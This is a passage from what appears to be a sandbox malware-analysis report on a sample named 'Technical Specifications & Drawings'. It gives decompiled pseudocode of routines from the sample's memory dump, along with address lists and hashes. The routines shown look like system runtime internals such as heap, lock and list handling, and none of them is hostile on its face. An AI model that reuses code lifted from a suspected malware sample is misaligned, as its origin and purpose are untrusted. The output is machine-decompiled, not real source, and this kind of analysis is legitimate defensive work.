				_t38 = L017C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E017EF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E017DD268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L017C77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                                  0x018246b7
                                                  0x018246ba
                                                  0x018246c5
                                                  0x018246c8
                                                  0x018246d0
                                                  0x018246d4
                                                  0x018246e6
                                                  0x018246e9
                                                  0x018246f4
                                                  0x018246ff
                                                  0x01824705
                                                  0x01824706
                                                  0x0182470c
                                                  0x01824713
                                                  0x0182471b
                                                  0x01824723
                                                  0x01824725
                                                  0x018246d6
                                                  0x018246d9
                                                  0x018246db
                                                  0x018246db
                                                  0x01824732

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                  • Instruction ID: ebda0e3853947a1fcb80953962f484d9f6d738f95065ef0dd476ecdea8b52058
                                                  • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                  • Instruction Fuzzy Hash: 46110272504208BBCB169F6CD8808BEF7B9EF95300F10806EF984CB350DA318E51C7A4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E37F5 Relevance: .1, Instructions: 57COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 87%
                                                  			E017E37F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E017C2280(_t6, 0x1898550);
				}
				_t29 = E017E387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E017BFFB0(0x1898550, _t27, 0x1898550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                                  0x017e37fa
                                                  0x017e37fc
                                                  0x017e3805
                                                  0x017e3808
                                                  0x017e3808
                                                  0x017e3814
                                                  0x017e3818
                                                  0x017e3846
                                                  0x017e3848
                                                  0x017e384b
                                                  0x017e384b
                                                  0x017e3852
                                                  0x00000000
                                                  0x017e3854
                                                  0x017e3856
                                                  0x00000000
                                                  0x00000000
                                                  0x017e3863
                                                  0x00000000
                                                  0x017e3863
                                                  0x017e381a
                                                  0x017e381a
                                                  0x017e381f
                                                  0x017e386e
                                                  0x017e386e
                                                  0x017e3871
                                                  0x017e3873
                                                  0x017e3873
                                                  0x017e3868
                                                  0x00000000
                                                  0x017e3868
                                                  0x017e3821
                                                  0x017e3826
                                                  0x00000000
                                                  0x00000000
                                                  0x017e3828
                                                  0x017e382a
                                                  0x017e3841
                                                  0x00000000
                                                  0x017e3841

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9545daa5ca110e88a9190e3f4bda31d9c33ec089c02d4f84537593940b97f913
                                                  • Instruction ID: 722a2edd11c9a36539f7d2781f4ad5fc99c239181b9eabca8a0c41cdd1161101
                                                  • Opcode Fuzzy Hash: 9545daa5ca110e88a9190e3f4bda31d9c33ec089c02d4f84537593940b97f913
                                                  • Instruction Fuzzy Hash: 7E01D672A816119BC3378B1D9948E26FBE6FFCAB51716406DE945CB216DB30C801CBE0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017D002D Relevance: .1, Instructions: 55COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E017D002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E017C7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E017C7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E017C7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E017C7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                                  0x017d0032
                                                  0x017d0037
                                                  0x017d0043
                                                  0x01814b3a
                                                  0x017d0049
                                                  0x017d0049
                                                  0x017d0049
                                                  0x017d004e
                                                  0x017d0053
                                                  0x01814b48
                                                  0x01814b5a
                                                  0x01814b4a
                                                  0x01814b53
                                                  0x01814b53
                                                  0x01814b5f
                                                  0x00000000
                                                  0x01814b61
                                                  0x00000000
                                                  0x01814b61
                                                  0x017d0059
                                                  0x017d0059
                                                  0x017d0060
                                                  0x01814b6f
                                                  0x01814b6f
                                                  0x017d0069
                                                  0x01814b83
                                                  0x00000000
                                                  0x00000000
                                                  0x01814b90
                                                  0x01814b9b
                                                  0x01814b9b
                                                  0x01814ba4
                                                  0x00000000
                                                  0x00000000
                                                  0x01814baa
                                                  0x00000000
                                                  0x017d006f
                                                  0x017d006f
                                                  0x00000000
                                                  0x017d006f
                                                  0x017d0069

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                  • Instruction ID: edd025439d5655f1dcd12d92ba23d051d7d96961c3036a8a06a5f48194a57442
                                                  • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                  • Instruction Fuzzy Hash: 89110473201A859FE72387ACC948B35BBE8BF40B54F1900E4ED05CB696D728C981C660
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017B766D Relevance: .1, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 94%
                                                  			E017B766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E017DF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E017DF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L017C4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                                  0x017b7672
                                                  0x017b767f
                                                  0x017b7689
                                                  0x017b76de
                                                  0x017b76de
                                                  0x017b768b
                                                  0x017b7691
                                                  0x017b7693
                                                  0x017b7697
                                                  0x00000000
                                                  0x017b7699
                                                  0x017b76a8
                                                  0x00000000
                                                  0x017b76aa
                                                  0x017b76ad
                                                  0x017b76b1
                                                  0x00000000
                                                  0x017b76b3
                                                  0x017b76b3
                                                  0x017b76b5
                                                  0x017b76ba
                                                  0x017b76bc
                                                  0x017b76bc
                                                  0x017b76c0
                                                  0x00000000
                                                  0x017b76c2
                                                  0x017b76ce
                                                  0x017b76ce
                                                  0x017b76c0
                                                  0x017b76b1
                                                  0x017b76a8
                                                  0x017b7697
                                                  0x017b76d9

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                  • Instruction ID: 6557b86021e143fb2050cd2de4dc6941178d2996a1796c5997a9d1ad28ba5bf2
                                                  • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                  • Instruction Fuzzy Hash: 6F01D432300119AFC7249E5ECCC5F9BFBADEBC4B60B280124BA09CB284DB30DC1183A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017A9080 Relevance: .1, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 69%
                                                  			E017A9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x18985ec;
				E017C2280(_t48, 0x18985ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E017BFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x189538c; // 0x77576828
					if( *_t84 != 0x1895388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x187f6e8);
						E017FD0E8(0x18985ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E018788F5(_t80, _t85, 0x1895388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x18986c0; // 0x12607b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x18986b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E017C2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E018788F5(0x18985ec, _t85, 0x1895388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E017EAFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x189b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x18984c0;
																			if(_t82 >=  *0x18984c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E01879063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E017A922A(_t99);
										_t64 = E017C7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E01878B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x18986c0; // 0x12607b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x18986b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x18986bc;
													_t87 = 0x18986b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E017A9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x18986c4;
												_t87 = 0x18986c0;
												L27:
												E017D9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E017FD130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x1895388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x189538c = _t51;
						goto L6;
					}
				}
			}




















                                                  0x017a9082
                                                  0x017a9083
                                                  0x017a9084
                                                  0x017a9085
                                                  0x017a9087
                                                  0x017a9096
                                                  0x017a9098
                                                  0x017a9098
                                                  0x017a909e
                                                  0x017a90a8
                                                  0x017a90e7
                                                  0x017a90e7
                                                  0x017a90aa
                                                  0x017a90b0
                                                  0x017a90b7
                                                  0x017a90bd
                                                  0x017a90dd
                                                  0x017a90e6
                                                  0x017a90bf
                                                  0x017a90bf
                                                  0x017a90c7
                                                  0x017a90cf
                                                  0x017a90f1
                                                  0x017a90f2
                                                  0x017a90f4
                                                  0x017a90f5
                                                  0x017a90f6
                                                  0x017a90f7
                                                  0x017a90f8
                                                  0x017a90f9
                                                  0x017a90fa
                                                  0x017a90fb
                                                  0x017a90fc
                                                  0x017a90fd
                                                  0x017a90fe
                                                  0x017a90ff
                                                  0x017a9100
                                                  0x017a9102
                                                  0x017a9107
                                                  0x017a910c
                                                  0x017a9110
                                                  0x017a9113
                                                  0x017a9115
                                                  0x017a9136
                                                  0x017a913f
                                                  0x017a9143
                                                  0x018037e4
                                                  0x018037e4
                                                  0x017a9117
                                                  0x017a9117
                                                  0x017a911d
                                                  0x00000000
                                                  0x017a911f
                                                  0x017a911f
                                                  0x017a9125
                                                  0x00000000
                                                  0x017a9127
                                                  0x017a912d
                                                  0x017a9130
                                                  0x017a9134
                                                  0x017a9158
                                                  0x017a915d
                                                  0x017a9161
                                                  0x017a9168
                                                  0x01803715
                                                  0x017a916e
                                                  0x017a916e
                                                  0x017a9175
                                                  0x017a9177
                                                  0x017a917e
                                                  0x017a917f
                                                  0x017a9182
                                                  0x017a9182
                                                  0x017a9187
                                                  0x017a9187
                                                  0x017a918a
                                                  0x017a918d
                                                  0x017a918f
                                                  0x017a9192
                                                  0x017a9195
                                                  0x017a9198
                                                  0x017a9198
                                                  0x017a9198
                                                  0x017a919a
                                                  0x00000000
                                                  0x00000000
                                                  0x0180371f
                                                  0x01803721
                                                  0x01803727
                                                  0x0180372f
                                                  0x01803733
                                                  0x01803735
                                                  0x01803738
                                                  0x0180373b
                                                  0x0180373d
                                                  0x01803740
                                                  0x00000000
                                                  0x01803746
                                                  0x01803746
                                                  0x01803749
                                                  0x00000000
                                                  0x0180374f
                                                  0x0180374f
                                                  0x01803751
                                                  0x01803757
                                                  0x01803759
                                                  0x0180375c
                                                  0x0180375c
                                                  0x0180375e
                                                  0x0180375e
                                                  0x01803761
                                                  0x01803764
                                                  0x00000000
                                                  0x00000000
                                                  0x01803766
                                                  0x01803768
                                                  0x018037a3
                                                  0x018037a3
                                                  0x018037a5
                                                  0x018037a7
                                                  0x018037ad
                                                  0x018037b0
                                                  0x018037b2
                                                  0x018037bc
                                                  0x018037c2
                                                  0x018037c2
                                                  0x018037b2
                                                  0x017a9187
                                                  0x017a9187
                                                  0x017a918a
                                                  0x017a918d
                                                  0x017a918f
                                                  0x017a9192
                                                  0x017a9195
                                                  0x00000000
                                                  0x017a9195
                                                  0x00000000
                                                  0x0180376a
                                                  0x0180376a
                                                  0x0180376a
                                                  0x0180376c
                                                  0x0180376c
                                                  0x0180376f
                                                  0x01803775
                                                  0x00000000
                                                  0x00000000
                                                  0x01803777
                                                  0x01803779
                                                  0x01803782
                                                  0x01803787
                                                  0x01803789
                                                  0x01803790
                                                  0x01803790
                                                  0x0180378b
                                                  0x0180378b
                                                  0x0180378b
                                                  0x01803792
                                                  0x01803795
                                                  0x00000000
                                                  0x01803795
                                                  0x00000000
                                                  0x01803779
                                                  0x01803798
                                                  0x00000000
                                                  0x01803798
                                                  0x00000000
                                                  0x01803768
                                                  0x0180379b
                                                  0x0180379b
                                                  0x01803751
                                                  0x01803749
                                                  0x00000000
                                                  0x01803740
                                                  0x017a91a0
                                                  0x017a91a3
                                                  0x017a91a9
                                                  0x017a91b0
                                                  0x00000000
                                                  0x017a91b0
                                                  0x017a9187
                                                  0x017a91b4
                                                  0x017a91b4
                                                  0x017a91bb
                                                  0x017a91c0
                                                  0x017a91c5
                                                  0x017a91c7
                                                  0x018037da
                                                  0x017a91cd
                                                  0x017a91cd
                                                  0x017a91cd
                                                  0x017a91d2
                                                  0x017a91d5
                                                  0x017a9239
                                                  0x017a9239
                                                  0x017a91d7
                                                  0x017a91db
                                                  0x017a91e1
                                                  0x017a91e7
                                                  0x017a91fd
                                                  0x017a9203
                                                  0x017a921e
                                                  0x017a9223
                                                  0x00000000
                                                  0x017a9205
                                                  0x017a9205
                                                  0x017a9208
                                                  0x017a920c
                                                  0x017a9214
                                                  0x017a9214
                                                  0x017a920c
                                                  0x017a91e9
                                                  0x017a91e9
                                                  0x017a91ee
                                                  0x017a91f3
                                                  0x017a91f3
                                                  0x017a91f3
                                                  0x017a91e7
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x017a9134
                                                  0x017a9125
                                                  0x017a911d
                                                  0x017a914e
                                                  0x017a90d1
                                                  0x017a90d1
                                                  0x017a90d3
                                                  0x017a90d6
                                                  0x017a90d8
                                                  0x00000000
                                                  0x017a90d8
                                                  0x017a90cf

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e3d83c4f06074e364aa4430449d4d89142c4b59e4a60792746ff0dbcbc7fbbc2
                                                  • Instruction ID: 78affe35817ebaeb65fa49609f8f26b74edc49210602bd571ee7a97d42a74c82
                                                  • Opcode Fuzzy Hash: e3d83c4f06074e364aa4430449d4d89142c4b59e4a60792746ff0dbcbc7fbbc2
                                                  • Instruction Fuzzy Hash: 5E01F472501206CFC3268F18D840B12FBA9EB82764F254166E301CB696C770DD51CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0183C450 Relevance: .1, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 46%
                                                  			E0183C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E017E9910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E017E95B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E017E95D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E017E95D0();
				return L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                                  0x0183c458
                                                  0x0183c45d
                                                  0x0183c466
                                                  0x0183c468
                                                  0x0183c469
                                                  0x0183c46a
                                                  0x0183c46b
                                                  0x0183c46e
                                                  0x0183c46f
                                                  0x0183c471
                                                  0x0183c476
                                                  0x0183c476
                                                  0x0183c47c
                                                  0x0183c47e
                                                  0x0183c480
                                                  0x0183c480
                                                  0x0183c483
                                                  0x0183c484
                                                  0x0183c486
                                                  0x0183c488
                                                  0x0183c48f
                                                  0x0183c491
                                                  0x0183c493
                                                  0x0183c493
                                                  0x0183c48f
                                                  0x0183c498
                                                  0x0183c49e
                                                  0x0183c4ad
                                                  0x0183c4ad
                                                  0x0183c4b2
                                                  0x0183c4b4
                                                  0x0183c4cd

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                  • Instruction ID: 9e6d8f460e56c6099cb8c8a00621c396f952ef514afa0d536e67066a6108a8c5
                                                  • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                  • Instruction Fuzzy Hash: FD019672140606BFE725AF69CC88E62FBADFF94754F144529F254925A4CB21ECA0CAE0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01874015 Relevance: .0, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 86%
                                                  			E01874015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E017C2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E017C2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x18986ac);
					E017AF900(0x18986d4, _t28);
					E017BFFB0(0x18986ac, _t28, 0x18986ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E017BFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                                  0x0187401a
                                                  0x0187401e
                                                  0x01874023
                                                  0x01874028
                                                  0x01874029
                                                  0x0187402b
                                                  0x0187402f
                                                  0x01874043
                                                  0x01874046
                                                  0x01874051
                                                  0x01874057
                                                  0x0187405f
                                                  0x01874062
                                                  0x01874067
                                                  0x0187406f
                                                  0x0187407c
                                                  0x0187407c
                                                  0x0187408c
                                                  0x0187408c
                                                  0x01874097

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
